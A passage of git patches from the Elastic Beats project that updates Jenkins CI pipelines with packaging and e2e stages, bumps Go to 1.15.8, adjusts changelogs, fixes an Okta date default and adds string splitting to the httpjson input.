credentialsId: '2a9602aa-ab9f-4e52-baf3-b71ca88469c7-UserAndToken', url: 'https://github.com/elastic/e2e-testing.git') + if(isDockerInstalled()) { + dockerLogin(secret: "${DOCKER_ELASTIC_SECRET}", registry: "${DOCKER_REGISTRY}") + } + def goVersionForE2E = readFile('.go-version').trim() + withEnv(["GO_VERSION=${goVersionForE2E}", + "BEATS_LOCAL_PATH=${env.WORKSPACE}/${env.BASE_DIR}", + "LOG_LEVEL=TRACE"]) { + def status = 0 + filebeat(output: dockerLogFile){ + status = sh(script: ".ci/scripts/${entrypoint}", + label: "Run functional tests ${entrypoint}", + returnStatus: true) + } + junit(allowEmptyResults: true, keepLongStdio: true, testResults: "outputs/TEST-*.xml") + archiveArtifacts allowEmptyArchive: true, artifacts: "outputs/TEST-*.xml" + if (status != 0) { + error("ERROR: functional tests for ${args?.directory?.trim()} has failed. See the test report and ${dockerLogFile}.") + } + } + } +} + /** * This method runs the given command supporting two kind of scenarios: * - make -C then the dir(location) is not required, aka by disaling isMage: false * - mage then the dir(location) is required, aka by enabling isMage: true. */ def target(Map args = [:]) { - def context = args.context def command = args.command + def context = args.context def directory = args.get('directory', '') def withModule = args.get('withModule', false) def isMage = args.get('isMage', false) + def isE2E = args.e2e?.get('enabled', false) + def isPackaging = args.get('package', false) withNode(args.label) { withGithubNotify(context: "${context}") { withBeatsEnv(archive: true, withModule: withModule, directory: directory, id: args.id) { @@ -279,6 +473,19 @@ def target(Map args = [:]) { dir(isMage ? directory : '') { cmd(label: "${args.id?.trim() ? args.id : env.STAGE_NAME} - ${command}", script: "${command}") } + // TODO: + // Packaging should happen only after the e2e? + if (isPackaging) { + publishPackages("${directory}") + } + if(isE2E) { + e2e(args) + } + // TODO: + // push docker images should happen only after the e2e? + if (isPackaging) { + pushCIDockerImages("${directory}") + } } } } @@ -354,7 +561,7 @@ def withBeatsEnv(Map args = [:], Closure body) { "USERPROFILE=${userProfile}" ]) { if(isDockerInstalled()) { - dockerLogin(secret: "${DOCKERELASTIC_SECRET}", registry: "${DOCKER_REGISTRY}") + dockerLogin(secret: "${DOCKER_ELASTIC_SECRET}", registry: "${DOCKER_REGISTRY}") } dir("${env.BASE_DIR}") { installTools(args) @@ -672,7 +879,7 @@ def dumpVariables(){ def isDockerInstalled(){ if (isUnix()) { // TODO: some issues with macosx if(isInstalled(tool: 'docker', flag: '--version')) { - return sh(label: 'check for Docker', script: 'command -v docker', returnStatus: true) + return sh(label: 'check for Docker', script: 'command -v docker', returnStatus: true) == 0 } else { return false } @@ -711,6 +918,9 @@ class RunCommand extends co.elastic.beats.BeatsFunction { if(args?.content?.containsKey('mage')) { steps.target(context: args.context, command: args.content.mage, directory: args.project, label: args.label, withModule: withModule, isMage: true, id: args.id) } + if(args?.content?.containsKey('packaging-linux')) { + steps.packagingLinux(context: args.context, command: args.content.get('packaging-linux'), directory: args.project, label: args.label, isMage: true, id: args.id, e2e: args.content.get('e2e'), package: true) + } if(args?.content?.containsKey('k8sTest')) { steps.k8sTest(context: args.context, versions: args.content.k8sTest.split(','), label: args.label, id: args.id) } diff --git a/Jenkinsfile.yml b/Jenkinsfile.yml index 22fd31ae4b1e..284000da86fe 100644 --- a/Jenkinsfile.yml +++ b/Jenkinsfile.yml @@ -14,13 +14,13 @@ projects: - "x-pack/elastic-agent" - "x-pack/filebeat" - "x-pack/functionbeat" + - "x-pack/heartbeat" - "x-pack/libbeat" - "x-pack/metricbeat" - "x-pack/packetbeat" - "x-pack/winlogbeat" - "dev-tools" - ##- "x-pack/heartbeat" It's not yet in the 1.0 pipeline. - ##- "x-pack/journalbeat" It's not yet in the 1.0 pipeline. + ##- "x-pack/journalbeat" It is not yet in the 1.0 pipeline. ## Changeset macros that are defined here and used in each specific 2.0 pipeline. changeset: diff --git a/auditbeat/Jenkinsfile.yml b/auditbeat/Jenkinsfile.yml index 168ac26edd50..346145606b50 100644 --- a/auditbeat/Jenkinsfile.yml +++ b/auditbeat/Jenkinsfile.yml @@ -83,3 +83,7 @@ stages: # - "windows-7" # branches: true ## for all the branches # tags: true ## for all the tags + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/filebeat/Jenkinsfile.yml b/filebeat/Jenkinsfile.yml index ea1215b65140..109474258283 100644 --- a/filebeat/Jenkinsfile.yml +++ b/filebeat/Jenkinsfile.yml @@ -81,3 +81,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/heartbeat/Jenkinsfile.yml b/heartbeat/Jenkinsfile.yml index de73acd5be79..8c1bbeaa574d 100644 --- a/heartbeat/Jenkinsfile.yml +++ b/heartbeat/Jenkinsfile.yml @@ -80,3 +80,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/journalbeat/Jenkinsfile.yml b/journalbeat/Jenkinsfile.yml index f120d5f936d7..0336f113162e 100644 --- a/journalbeat/Jenkinsfile.yml +++ b/journalbeat/Jenkinsfile.yml @@ -33,3 +33,7 @@ stages: tags: true ## for all the tags unitTest: mage: "mage build unitTest" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/metricbeat/Jenkinsfile.yml b/metricbeat/Jenkinsfile.yml index 2bdb1218a5d2..70874ab12779 100644 --- a/metricbeat/Jenkinsfile.yml +++ b/metricbeat/Jenkinsfile.yml @@ -75,3 +75,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false ## e2e is enabled only for x-pack beats diff --git a/packetbeat/Jenkinsfile.yml b/packetbeat/Jenkinsfile.yml index 0225058ab1c7..3205b791b791 100644 --- a/packetbeat/Jenkinsfile.yml +++ b/packetbeat/Jenkinsfile.yml @@ -81,3 +81,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/winlogbeat/Jenkinsfile.yml b/winlogbeat/Jenkinsfile.yml index 44ee6c06513c..a66ffcf1c732 100644 --- a/winlogbeat/Jenkinsfile.yml +++ b/winlogbeat/Jenkinsfile.yml @@ -51,3 +51,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/auditbeat/Jenkinsfile.yml b/x-pack/auditbeat/Jenkinsfile.yml index deb1fdddd3a4..7a1edec5dd27 100644 --- a/x-pack/auditbeat/Jenkinsfile.yml +++ b/x-pack/auditbeat/Jenkinsfile.yml @@ -81,3 +81,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/dockerlogbeat/Jenkinsfile.yml b/x-pack/dockerlogbeat/Jenkinsfile.yml index bc430fbf89f4..ee9a4b06aca5 100644 --- a/x-pack/dockerlogbeat/Jenkinsfile.yml +++ b/x-pack/dockerlogbeat/Jenkinsfile.yml @@ -21,3 +21,7 @@ stages: build: mage: "mage build test" withModule: true ## run the ITs only if the changeset affects a specific module. + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/elastic-agent/Jenkinsfile.yml b/x-pack/elastic-agent/Jenkinsfile.yml index 0e6ecef9e4cd..9a30d836391b 100644 --- a/x-pack/elastic-agent/Jenkinsfile.yml +++ b/x-pack/elastic-agent/Jenkinsfile.yml @@ -85,3 +85,7 @@ stages: # - "windows-7-32" # branches: true ## for all the branches # tags: true ## for all the tags + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/filebeat/Jenkinsfile.yml b/x-pack/filebeat/Jenkinsfile.yml index 0581f2cd8600..5985900fcdad 100644 --- a/x-pack/filebeat/Jenkinsfile.yml +++ b/x-pack/filebeat/Jenkinsfile.yml @@ -88,3 +88,7 @@ stages: # - "windows-7-32" # branches: true ## for all the branches # tags: true ## for all the tags + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false \ No newline at end of file diff --git a/x-pack/functionbeat/Jenkinsfile.yml b/x-pack/functionbeat/Jenkinsfile.yml index ec9a4ec57f09..c6cb19ddcf6c 100644 --- a/x-pack/functionbeat/Jenkinsfile.yml +++ b/x-pack/functionbeat/Jenkinsfile.yml @@ -76,3 +76,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/heartbeat/Jenkinsfile.yml b/x-pack/heartbeat/Jenkinsfile.yml new file mode 100644 index 000000000000..b715d109a12c --- /dev/null +++ b/x-pack/heartbeat/Jenkinsfile.yml @@ -0,0 +1,19 @@ +when: + branches: true ## for all the branches + changeset: ## when PR contains any of those entries in the changeset + - "^x-pack/heartbeat/.*" + - "@ci" ## special token regarding the changeset for the ci + - "@xpack" ## special token regarding the changeset for the xpack + comments: ## when PR comment contains any of those entries + - "/test x-pack/heartbeat" + labels: ## when PR labels matches any of those entries + - "x-pack-heartbeat" + parameters: ## when parameter was selected in the UI. + - "x-pack-heartbeat" + tags: true ## for all the tags +platform: "immutable && ubuntu-18" ## default label for all the stages +stages: + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/metricbeat/Jenkinsfile.yml b/x-pack/metricbeat/Jenkinsfile.yml index 68751834f7d2..08aaa1d6fc0f 100644 --- a/x-pack/metricbeat/Jenkinsfile.yml +++ b/x-pack/metricbeat/Jenkinsfile.yml @@ -79,3 +79,8 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false + entrypoint: 'metricbeat-test.sh' diff --git a/x-pack/packetbeat/Jenkinsfile.yml b/x-pack/packetbeat/Jenkinsfile.yml index 7cc39a8b5015..dcefc94c6694 100644 --- a/x-pack/packetbeat/Jenkinsfile.yml +++ b/x-pack/packetbeat/Jenkinsfile.yml @@ -82,3 +82,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/winlogbeat/Jenkinsfile.yml b/x-pack/winlogbeat/Jenkinsfile.yml index 0fcde2f326ce..8b03fed80a3e 100644 --- a/x-pack/winlogbeat/Jenkinsfile.yml +++ b/x-pack/winlogbeat/Jenkinsfile.yml @@ -55,3 +55,9 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false + platforms: ## override default labels in this specific stage. + - "immutable && ubuntu-18" From 3ac4d74e595f26d40ffd530f5eb15d6288085e92 Mon Sep 17 00:00:00 2001 From: Michal Pristas Date: Thu, 11 Feb 2021 16:54:14 +0100 Subject: [PATCH 32/63] Update Golang to 1.15.8 (#23955) Update Golang to 1.15.8 (#23955) --- .go-version | 2 +- CHANGELOG-developer.next.asciidoc | 1 + auditbeat/Dockerfile | 2 +- filebeat/Dockerfile | 2 +- heartbeat/Dockerfile | 2 +- journalbeat/Dockerfile | 2 +- libbeat/Dockerfile | 2 +- libbeat/docs/version.asciidoc | 2 +- metricbeat/Dockerfile | 2 +- metricbeat/module/http/_meta/Dockerfile | 2 +- packetbeat/Dockerfile | 2 +- x-pack/functionbeat/Dockerfile | 2 +- x-pack/libbeat/Dockerfile | 2 +- 13 files changed, 13 insertions(+), 12 deletions(-) diff --git a/.go-version b/.go-version index 545fd574d35b..98e863cdf81f 100644 --- a/.go-version +++ b/.go-version @@ -1 +1 @@ -1.15.7 +1.15.8 diff --git a/CHANGELOG-developer.next.asciidoc b/CHANGELOG-developer.next.asciidoc index 51a4565e4ff2..ba659a3ff31e 100644 --- a/CHANGELOG-developer.next.asciidoc +++ b/CHANGELOG-developer.next.asciidoc @@ -107,3 +107,4 @@ The list below covers the major changes between 7.0.0-rc2 and master only. - Update ecszap to v0.3.0 for using ECS 1.6.0 in logs {pull}22267[22267] - Add support for customized monitoring API. {pull}22605[22605] - Update Go version to 1.15.7. {pull}22495[22495] +- Update Go version to 1.15.8. {pull}23955[23955] diff --git a/auditbeat/Dockerfile b/auditbeat/Dockerfile index e5767ab11670..98c459dc4f48 100644 --- a/auditbeat/Dockerfile +++ b/auditbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/filebeat/Dockerfile b/filebeat/Dockerfile index 8b3983fa8da3..3750939e8ce3 100644 --- a/filebeat/Dockerfile +++ b/filebeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/heartbeat/Dockerfile b/heartbeat/Dockerfile index 51c2b06d485f..ed2c4d109186 100644 --- a/heartbeat/Dockerfile +++ b/heartbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/journalbeat/Dockerfile b/journalbeat/Dockerfile index 36af746307c1..096b2ec1e791 100644 --- a/journalbeat/Dockerfile +++ b/journalbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/libbeat/Dockerfile b/libbeat/Dockerfile index cc9829656ed7..6c99894603cf 100644 --- a/libbeat/Dockerfile +++ b/libbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/libbeat/docs/version.asciidoc b/libbeat/docs/version.asciidoc index 89578a6f7a27..40b2d1d836d4 100644 --- a/libbeat/docs/version.asciidoc +++ b/libbeat/docs/version.asciidoc @@ -1,6 +1,6 @@ :stack-version: 8.0.0 :doc-branch: master -:go-version: 1.15.7 +:go-version: 1.15.8 :release-state: unreleased :python: 3.7 :docker: 1.12 diff --git a/metricbeat/Dockerfile b/metricbeat/Dockerfile index 4b76f73bafb3..4d96de35265a 100644 --- a/metricbeat/Dockerfile +++ b/metricbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt update \ diff --git a/metricbeat/module/http/_meta/Dockerfile b/metricbeat/module/http/_meta/Dockerfile index 9d104c32a7e5..64d1de65fe0f 100644 --- a/metricbeat/module/http/_meta/Dockerfile +++ b/metricbeat/module/http/_meta/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 COPY test/main.go main.go diff --git a/packetbeat/Dockerfile b/packetbeat/Dockerfile index 6c5abe6309a8..f48ccaadd290 100644 --- a/packetbeat/Dockerfile +++ b/packetbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/x-pack/functionbeat/Dockerfile b/x-pack/functionbeat/Dockerfile index 77daddd7a86c..53950aa33b69 100644 --- a/x-pack/functionbeat/Dockerfile +++ b/x-pack/functionbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/x-pack/libbeat/Dockerfile b/x-pack/libbeat/Dockerfile index 1a0c44db3986..935a38c83651 100644 --- a/x-pack/libbeat/Dockerfile +++ b/x-pack/libbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ From 015315065802e4c6adeb1cc5340b49ec55e7777a Mon Sep 17 00:00:00 2001 From: Andres Rodriguez Date: Thu, 11 Feb 2021 19:10:21 +0100 Subject: [PATCH 33/63] docs: Forward port Changelog for 7.11.1 to master (#24010) (#24014) * docs: Prepare Changelog for 7.11.1 (#24010) * docs: Close changelog for 7.11.1 * Remove empty sections Co-authored-by: Andres Rodriguez (cherry picked from commit 965da41d3d1a0b37c99f34524ac6dd0d3c4ba8db) * Fix removals Co-authored-by: Elastic Machine --- CHANGELOG.asciidoc | 15 +++++++++++++++ CHANGELOG.next.asciidoc | 6 +----- libbeat/docs/release.asciidoc | 1 + 3 files changed, 17 insertions(+), 5 deletions(-) diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc index 978ba36419d1..0d1ea0d2ebee 100644 --- a/CHANGELOG.asciidoc +++ b/CHANGELOG.asciidoc @@ -3,6 +3,21 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.11.1]] +=== Beats version 7.11.1 +https://github.com/elastic/beats/compare/v7.11.0...v7.11.1[View commits] + +==== Bugfixes + +*Filebeat* + +- Fix goroutines leak with some inputs in autodiscover. {pull}23722[23722] +- Fix various processing errors in the Suricata module. {pull}23236[23236] + +*Elastic Logging Plugin* + +- Fix out of date CLI flags on docs. {pull}23628[23628] + [[release-notes-7.11.0]] === Beats version 7.11.0 https://github.com/elastic/beats/compare/v7.10.2...v7.11.0[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index cf8a8350f683..3a6f59df63c2 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -265,7 +265,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix mapping error for cloudtrail additionalEventData field {pull}16088[16088] - Fix a connection error in httpjson input. {pull}16123[16123] - Fix integer overflow in S3 offsets when collecting very large files. {pull}22523[22523] -- Fix various processing errors in the Suricata module. {pull}23236[23236] - Fix CredentialsJSON unpacking for `gcp-pubsub` and `httpjson` inputs. {pull}23277[23277] - CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] - Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] @@ -277,7 +276,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Change the `event.created` in Netflow events to be the time the event was created by Filebeat to be consistent with ECS. {pull}23094[23094] - Update `filestream` reader offset when a line is skipped. {pull}23417[23417] -- Fix goroutines leak with some inputs in autodiscover. {pull}23722[23722] *Filebeat* @@ -379,8 +377,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] - Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] -- Fix goroutines leak with some inputs in autodiscover. {pull}23722[23722] -- Fix various processing errors in the Suricata module. {pull}23236[23236] - Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] *Heartbeat* @@ -517,7 +513,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Functionbeat* *Elastic Logging Plugin* -- Fix out of date CLI flags on docs. {pull}23628[23628] ==== Added @@ -1033,3 +1028,4 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d + diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc index 08fdad1c8239..b84a4aa0ae91 100644 --- a/libbeat/docs/release.asciidoc +++ b/libbeat/docs/release.asciidoc @@ -8,6 +8,7 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade. +* <> * <> * <> * <> From 934d978bc27227c7d326e78135da6932bd5992bb Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Thu, 11 Feb 2021 18:20:29 +0000 Subject: [PATCH 34/63] Fix regression with the elastic-agent release (#24011) --- dev-tools/common.bash | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/dev-tools/common.bash b/dev-tools/common.bash index c65666526bf6..72940c0591ec 100644 --- a/dev-tools/common.bash +++ b/dev-tools/common.bash @@ -41,7 +41,11 @@ get_go_version() { setup_go_root() { local version=${1} export PROPERTIES_FILE=go_env.properties - GO_VERSION="${version}" .ci/scripts/install-go.sh + + # Support cases when the call to this script is done not from the + # root folder but from a nested folder. + BASEDIR=$(dirname "$(dirname "$0")") + GO_VERSION="${version}" "${BASEDIR}"/.ci/scripts/install-go.sh # Setup GOROOT and add go to the PATH. # shellcheck disable=SC1090 From 2c5886ac3c9991b1e86b2396976f5397be78407c Mon Sep 17 00:00:00 2001 From: Marc Guasch Date: Fri, 12 Feb 2021 17:32:56 +0100 Subject: [PATCH 35/63] Fix okta default date in module config (#24025) --- CHANGELOG.next.asciidoc | 1 + x-pack/filebeat/module/okta/system/config/input.yml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 3a6f59df63c2..cdfce9ba5aa8 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -378,6 +378,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] - Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] - Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] +- Fix Okta default date formatting. {issue}24018[24018] {pull}24025[24025] *Heartbeat* diff --git a/x-pack/filebeat/module/okta/system/config/input.yml b/x-pack/filebeat/module/okta/system/config/input.yml index 107dd3ca320e..be1634d73ae9 100644 --- a/x-pack/filebeat/module/okta/system/config/input.yml +++ b/x-pack/filebeat/module/okta/system/config/input.yml @@ -25,7 +25,7 @@ request.transforms: - set: target: url.params.since value: "[[.cursor.published]]" - default: '[[now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}")) "RFC3339"]]' response.pagination: - set: From 5414972f435d8c03813ff79049c0ac0ffab77304 Mon Sep 17 00:00:00 2001 From: Lee Hinman <57081003+leehinman@users.noreply.github.com> Date: Fri, 12 Feb 2021 13:27:03 -0600 Subject: [PATCH 36/63] [Filebeat] httpjson split strings on delimiter (#24022) * [Filebeat] httpjson split strings on delimiter - adds new split type "string" - adds new split config option "delimiter" --- CHANGELOG.next.asciidoc | 1 + .../docs/inputs/input-httpjson.asciidoc | 59 ++++++++++++++++++- .../httpjson/internal/v2/config_response.go | 22 ++++--- .../input/httpjson/internal/v2/split.go | 56 ++++++++++++++++-- .../input/httpjson/internal/v2/split_test.go | 20 +++++++ 5 files changed, 144 insertions(+), 14 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index cdfce9ba5aa8..9305d523f7f6 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -824,6 +824,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Move aws-s3 input to GA. {pull}23631[23631] - Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] - Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] +- Added string splitting for httpjson input {pull}24022[24022] *Heartbeat* diff --git a/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc b/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc index 64247b517f82..56b022d3e9a0 100644 --- a/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc +++ b/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc @@ -499,7 +499,7 @@ filebeat.inputs: [float] ==== `response.split` -Split operation to apply to the response once it is received. A split can convert a map or an array into multiple events. +Split operation to apply to the response once it is received. A split can convert a map, array, or string into multiple events. [float] ==== `response.split[].target` @@ -509,7 +509,7 @@ Defines the target field upon the split operation will be performed. [float] ==== `response.split[].type` -Defines the field type of the target. Allowed values: `array`, `map`. Default: `array`. +Defines the field type of the target. Allowed values: `array`, `map`, `string`. `string` requires the use of the `delimiter` options to specify what characters to split the string on. `delimiter` always behaves as if `keep_parent` is set to `true`. Default: `array`. [float] ==== `response.split[].transforms` @@ -529,6 +529,11 @@ NOTE: in this context, `body.*` will be the result of all the previous transform If set to true, the fields from the parent document (at the same level as `target`) will be kept. Otherwise a new document will be created using `target` as the root. Default: `false`. +[float] +==== `response.split[].delimiter` + +Required if using split type of `string`. This is the sub string used to split the string. For example if `delimiter` was "\n" and the string was "line 1\nline 2", then the split would result in "line 1" and "line 2". + [float] ==== `response.split[].key_field` @@ -804,6 +809,56 @@ This will output: ] ---- +- We have a response with a keys whose value is a string. We want the string to be split on a delimiter and a document for each sub strings. + ++ +["source","json",subs="attributes"] +---- +{ + "this": "is kept", + "lines": "Line 1\nLine 2\nLine 3" +} +---- + ++ +The config will look like: + ++ +["source","yaml",subs="attributes"] +---- +filebeat.inputs: +- type: httpjson + config_version: 2 + interval: 1m + request.url: https://example.com + response.split: + target: body.lines + type: string + delimiter: "\n" +---- + ++ +This will output: + ++ +["source","json",subs="attributes"] +---- +[ + { + "this": "is kept", + "lines": "Line 1" + }, + { + "this": "is kept", + "lines": "Line 2" + }, + { + "this": "is kept", + "lines": "Line 3" + } +] +---- + [[cursor]] [float] ==== `cursor` diff --git a/x-pack/filebeat/input/httpjson/internal/v2/config_response.go b/x-pack/filebeat/input/httpjson/internal/v2/config_response.go index be265409ba84..0bb519103871 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/config_response.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/config_response.go @@ -10,8 +10,9 @@ import ( ) const ( - splitTypeArr = "array" - splitTypeMap = "map" + splitTypeArr = "array" + splitTypeMap = "map" + splitTypeString = "string" ) type responseConfig struct { @@ -23,12 +24,13 @@ type responseConfig struct { } type splitConfig struct { - Target string `config:"target" validation:"required"` - Type string `config:"type"` - Transforms transformsConfig `config:"transforms"` - Split *splitConfig `config:"split"` - KeepParent bool `config:"keep_parent"` - KeyField string `config:"key_field"` + Target string `config:"target" validation:"required"` + Type string `config:"type"` + Transforms transformsConfig `config:"transforms"` + Split *splitConfig `config:"split"` + KeepParent bool `config:"keep_parent"` + KeyField string `config:"key_field"` + DelimiterString string `config:"delimiter"` } func (c *responseConfig) Validate() error { @@ -58,6 +60,10 @@ func (c *splitConfig) Validate() error { return fmt.Errorf("key_field can only be used with a %s split type", splitTypeMap) } case splitTypeMap: + case splitTypeString: + if c.DelimiterString == "" { + return fmt.Errorf("delimiter required for split type %s", splitTypeString) + } default: return fmt.Errorf("invalid split type: %s", c.Type) } diff --git a/x-pack/filebeat/input/httpjson/internal/v2/split.go b/x-pack/filebeat/input/httpjson/internal/v2/split.go index 823b57c39fb1..9cb686e63adb 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/split.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/split.go @@ -7,16 +7,18 @@ package v2 import ( "errors" "fmt" + "strings" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/logp" ) var ( - errEmptyField = errors.New("the requested field is empty") - errEmptyRootField = errors.New("the requested root field is empty") - errExpectedSplitArr = errors.New("split was expecting field to be an array") - errExpectedSplitObj = errors.New("split was expecting field to be an object") + errEmptyField = errors.New("the requested field is empty") + errEmptyRootField = errors.New("the requested root field is empty") + errExpectedSplitArr = errors.New("split was expecting field to be an array") + errExpectedSplitObj = errors.New("split was expecting field to be an object") + errExpectedSplitString = errors.New("split was expecting field to be a string") ) type split struct { @@ -28,6 +30,7 @@ type split struct { keepParent bool keyField string isRoot bool + delimiter string } func newSplitResponse(cfg *splitConfig, log *logp.Logger) (*split, error) { @@ -73,6 +76,7 @@ func newSplit(c *splitConfig, log *logp.Logger) (*split, error) { kind: c.Type, keepParent: c.KeepParent, keyField: c.KeyField, + delimiter: c.DelimiterString, transforms: ts, child: s, }, nil @@ -139,6 +143,26 @@ func (s *split) split(ctx *transformContext, root common.MapStr, ch chan<- maybe } } + return nil + case splitTypeString: + vstr, ok := v.(string) + if !ok { + return errExpectedSplitString + } + + if len(vstr) == 0 { + if s.isRoot { + return errEmptyRootField + } + ch <- maybeMsg{msg: root} + return errEmptyField + } + for _, substr := range strings.Split(vstr, s.delimiter) { + if err := s.sendMessageSplitString(ctx, root, substr, ch); err != nil { + s.log.Debug(err) + } + } + return nil } @@ -195,3 +219,27 @@ func toMapStr(v interface{}) (common.MapStr, bool) { } return common.MapStr{}, false } + +func (s *split) sendMessageSplitString(ctx *transformContext, root common.MapStr, v string, ch chan<- maybeMsg) error { + clone := root.Clone() + _, _ = clone.Put(s.targetInfo.Name, v) + + tr := transformable{} + tr.setBody(clone) + + var err error + for _, t := range s.transforms { + tr, err = t.run(ctx, tr) + if err != nil { + return err + } + } + + if s.child != nil { + return s.child.split(ctx, clone, ch) + } + + ch <- maybeMsg{msg: clone} + + return nil +} diff --git a/x-pack/filebeat/input/httpjson/internal/v2/split_test.go b/x-pack/filebeat/input/httpjson/internal/v2/split_test.go index c6ad4a6170c3..2c53d0fcbe13 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/split_test.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/split_test.go @@ -334,6 +334,26 @@ func TestSplit(t *testing.T) { {"baz": "buzz", "splitHere": common.MapStr{"splitMore": common.MapStr{"deepest2": "data"}}}, }, }, + { + name: "Split string", + config: &splitConfig{ + Target: "body.items", + Type: "string", + DelimiterString: "\n", + }, + ctx: 